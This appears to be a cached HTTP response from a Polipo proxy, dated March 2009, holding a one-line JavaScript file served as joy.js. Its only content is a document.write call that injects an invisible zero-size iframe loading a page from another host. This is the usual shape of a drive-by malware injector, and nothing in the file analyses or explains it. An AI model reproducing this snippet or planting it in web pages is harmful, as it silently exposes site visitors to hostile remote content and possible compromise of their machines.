HTTP/1.1 200 OK
Content-Length: 120
ETag: "10ae568e69a2c91:243"
Date: Thu, 12 Mar 2009 07:05:59 GMT
Last-Modified: Wed, 11 Mar 2009 16:51:00 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://dow.2288.org/joy.js
X-Polipo-Date: Thu, 12 Mar 2009 07:13:40 GMT
X-Polipo-Access: Wed, 18 Mar 2009 08:57:56 GMT

document.write ('<iframe src="http://d11.8800.org/joy.html" width="0" height="0" frameborder="0"></iframe>"></script>');